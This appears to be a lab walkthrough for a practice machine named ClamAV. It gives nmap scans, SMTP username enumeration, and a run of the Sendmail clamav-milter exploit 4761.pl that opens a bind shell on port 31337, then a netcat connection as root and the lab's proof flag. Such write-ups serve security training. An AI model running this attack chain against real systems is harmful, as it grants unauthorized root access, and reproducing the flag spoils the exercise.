																							              ClamAV Walkthrough
																										
Attacker's Machine: 192.168.49.68
Victim's Machine: 192.168.68.42
export IP=192.168.68.42
	
1. nmap -Pn -p- -n  --min-rate 1000 $IP --stats-every=5s
2. nmap -Pn -n -sC -sV -p22,25,80,139,199,445,60000 $IP --open --stats-every=5s -oN results.txt
 
22/tcp    open  ssh         OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
25/tcp    open  smtp        Sendmail 8.13.4/8.13.4/Debian-3sarge3
80/tcp    open  http        Apache httpd 1.3.33 ((Debian GNU/Linux))
|_  Potentially risky methods: TRACE
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
199/tcp   open  smux        Linux SNMP multiplexer
445/tcp   open  netbios-ssn Samba smbd 3.0.14a-Debian (workgroup: WORKGROUP)
60000/tcp open  ssh         OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)

Service Info: Host: localhost.localdomain; OSs: Linux


3. nmap -sU -n -Pn $IP --top-ports=100 --stats-every=5s --min-rate 1000

137/udp open  netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP)
161/udp open  snmp       SNMPv1 server; U.C. Davis, ECE Dept. Tom SNMPv3 server (public)
3781: 
|     Name: clamav-milter
|     Path: /usr/local/sbin/clamav-milter


Vulnerability Assessment

Port 25 - SMTP

smtp-user-enum -M VRFY -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP -p 25 

192.168.68.42: mail exists
192.168.68.42: webmaster exists
192.168.68.42: root exists
192.168.68.42: news exists
192.168.68.42: man exists
192.168.68.42: bin exists
192.168.68.42: games exists

nc -vn $IP 25
220 ESMTP OpenSMTPD


searchsploit sendmail
Sendmail with clamav-milter < 0.91.2 - Remote Command Execution                                                                | multiple/remote/4761.pl

perl 4761.pl 192.168.68.42          //  the script will open up port 31337 to receive connections on

 nmap -Pn -p- -n  --min-rate 1000 $IP --stats-every=5s
 
199/tcp   open  smux
445/tcp   open  microsoft-ds
31337/tcp open  Elite
60000/tcp open  unknown

nc 192.168.68.42 31337               // Use netcat to connect to the port as the root user.

cat proof.txt      // 89f936ee07a36aff72ee9fc95d6d0763









